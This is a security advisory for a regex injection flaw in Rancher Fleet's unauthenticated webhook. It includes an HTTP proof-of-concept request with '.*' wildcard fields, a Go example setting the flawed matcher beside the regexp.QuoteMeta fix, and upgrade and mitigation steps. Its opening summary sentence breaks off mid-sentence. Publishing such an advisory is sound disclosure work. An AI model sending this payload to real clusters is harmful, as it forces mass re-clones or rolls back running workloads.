Severity: high · CVSS 7.5 · CVE-2026-44937 · Jul 1, 2026

CVE-2026-44937: Rancher Fleet Unauthenticated Webhook Regex Injection via Unsanitized Repository URL

Shubham Kandhare
Security Engagement Manager, SecureLayer7

When Fleet's webhook endpoint runs without a shared secret, an attacker can send a forged webhook request containing regex metacharacters in the repository URL or path field, causing Fleet to match an

Package: github.com/rancher/fleet
Ecosystem: go
Affected: >= 0.15.0, < 0.15.2
Fixed in: 0.15.2

The problem

Fleet's gitjob webhook handler extracts the repository URL and path directly from the inbound HTTP payload and compiles them into a Go regular expression to find matching GitRepo resources. No authentication is required when no webhook secret is configured.

An attacker who sends a crafted POST request with a regex wildcard like `.*` as the repository URL will match every GitRepo on the management cluster, forcing repeated re-clones (resource exhaustion) or rolling back running workloads to any historical commit they can reference.

Proof of concept

The proof-of-concept payload for CVE-2026-44937 in github.com/rancher/fleet is shown below.

```http
POST /webhook HTTP/1.1
Host: fleet-gitjob.cattle-fleet-system.svc
Content-Type: application/json
X-Github-Event: push

{
  "ref": "refs/heads/main",
  "repository": {
    "url": ".*",
    "clone_url": ".*"
  },
  "commits": [
    {
      "added": [],
      "modified": [".*"],
      "removed": []
    }
  ]
}
```

The pre-patch code in `pkg/webhook/webhook.go` builds a `*regexp.Regexp` directly from the attacker-supplied `repository.url` and path values, then iterates all GitRepo objects testing each one with `re.MatchString(gitrepo.Spec.Repo)`. Supplying `.*` as the URL produces a pattern that matches every repo unconditionally.

The fix applies `regexp.QuoteMeta()` to both the URL and path strings before regex compilation, making all metacharacters literal. This is the standard Go idiom for treating user input as a plain string rather than a pattern. CWE-345 (Insufficient Verification of Data Authenticity) applies because the endpoint accepted and acted on unsigned, unvalidated input when no secret was set.
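To make the mechanism concrete, the following added Go example (written for this advisory, not Fleet's own code) places the flawed matcher beside the `regexp.QuoteMeta` version and runs both over a constructed list of GitRepo `spec.repo` values; the repository URLs and function names are illustrative assumptions.

```go
package main

import (
	"fmt"
	"regexp"
)

// Constructed sample of GitRepo spec.repo values, standing in for the
// resources Fleet lists on the management cluster (not real data).
var sampleRepos = []string{
	"https://github.com/example-org/app-a.git",
	"https://github.com/example-org/app-b.git",
	"https://git.internal.example/platform/infra.git",
}

// matchReposVulnerable reproduces the flawed pattern the advisory describes:
// the webhook-supplied URL is compiled directly as a regular expression, so
// metacharacters such as ".*" are interpreted rather than treated as text.
func matchReposVulnerable(webhookURL string, repos []string) ([]string, error) {
	re, err := regexp.Compile(webhookURL)
	if err != nil {
		return nil, err
	}
	var matched []string
	for _, r := range repos {
		if re.MatchString(r) {
			matched = append(matched, r)
		}
	}
	return matched, nil
}

// matchReposFixed applies regexp.QuoteMeta before compiling, so the URL can
// only match itself as a literal string: ".*" matches no real repository and
// an otherwise invalid pattern like "(" no longer causes a compile error.
func matchReposFixed(webhookURL string, repos []string) ([]string, error) {
	re, err := regexp.Compile(regexp.QuoteMeta(webhookURL))
	if err != nil {
		return nil, err
	}
	var matched []string
	for _, r := range repos {
		if re.MatchString(r) {
			matched = append(matched, r)
		}
	}
	return matched, nil
}

func main() {
	for _, url := range []string{".*", "https://github.com/example-org/app-a.git"} {
		v, _ := matchReposVulnerable(url, sampleRepos)
		f, _ := matchReposFixed(url, sampleRepos)
		fmt.Printf("url=%q vulnerable=%d fixed=%d\n", url, len(v), len(f))
	}
}
```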

The fix

Upgrade Rancher Fleet to v0.15.2 (or v0.14.6, v0.13.11, v0.12.15 for older release lines). If an immediate upgrade is not possible, configure a webhook shared secret (`gitjob-webhook` Secret in `cattle-fleet-system`) so that unsigned requests are rejected before any URL matching occurs.

Reported by Radisauskas Arnoldas (NATO / NATO Cyber Security Centre).

References: [1][2]
